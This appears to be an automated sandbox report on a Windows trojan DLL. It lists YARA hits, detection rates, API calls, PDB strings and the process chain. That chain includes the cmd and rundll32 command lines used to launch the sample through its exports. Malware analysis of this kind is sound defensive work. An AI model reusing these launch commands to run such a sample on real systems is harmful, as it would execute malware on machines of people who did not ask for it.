                      Source: Yara matchFile source: 00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.734461323.000000006E471000.00000020.00020000.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: G7ABVJxc3Z.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: G7ABVJxc3Z.dllBinary or memory string: OriginalFilenameHen.dllD vs G7ABVJxc3Z.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: lz32.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4807300_2_6E480730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4893700_2_6E489370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4784280_2_6E478428
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E48143C0_2_6E48143C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E47A4E80_2_6E47A4E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4714940_2_6E471494
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E482234 NtDelayExecution,0_2_6E482234
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E482820 NtAllocateVirtualMemory,0_2_6E482820
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E47BB44 NtClose,0_2_6E47BB44
                      Source: C:\Windows\System32\loaddll32.exeProcess Stats: CPU usage > 98%
                      Source: G7ABVJxc3Z.dllVirustotal: Detection: 64%
                      Source: G7ABVJxc3Z.dllReversingLabs: Detection: 67%
                      Source: G7ABVJxc3Z.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,WgpomsdeeomtunmdrtJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6496
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE64C.tmpJump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@9/10@0/4
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: G7ABVJxc3Z.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: G7ABVJxc3Z.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: advapi32.pdbg source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: wininet.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb- source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.738518668.00000000047D6000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.746276509.00000000052BA000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: dwmapi.pdb9 source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: WINMMBASE.pdb/ source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb[ source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: ntdsapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: combase.pdb7 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: powrprof.pdbO source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.775462596.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754227326.0000000005005000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000A.00000002.766190081.00000000030C2000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbE source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: fltLib.pdbO source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.739048993.0000000002A3C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sechost.pdb# source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: lz32.pdbo source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb; source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ffty.pdbb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msctf.pdbW source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754227326.0000000005005000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdba source: WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.775462596.000000004B280000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdb] source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: winmm.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wsspicli.pdbg source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: bcrypt.pdba source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: esent.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: esent.pdbM source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: pdh.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ffty.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp, G7ABVJxc3Z.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdbC source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: lz32.pdb= source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754153760.0000000005002000.00000004.00000010.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.743939935.0000000004E20000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754217148.0000000005000000.00000004.00000010.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ole32.pdb1 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.743926557.0000000004C61000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.754112021.0000000005731000.00000004.00000001.sdmp
                      Source: Binary string: lz32.pdb source: WerFault.exe, 00000007.00000003.743950383.0000000004E26000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: sfc_os.pdb] source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: ws2_32.pdbE source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wimm32.pdbS source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: esent.pdb3 source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: Binary string: wininet.pdb) source: WerFault.exe, 0000000A.00000003.754238093.0000000005008000.00000004.00000010.sdmp, WerFault.exe, 0000000A.00000003.754170078.0000000005008000.00000004.00000010.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E47F6A8 push esi; mov dword ptr [esp], 00000000h0_2_6E47F6A9
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
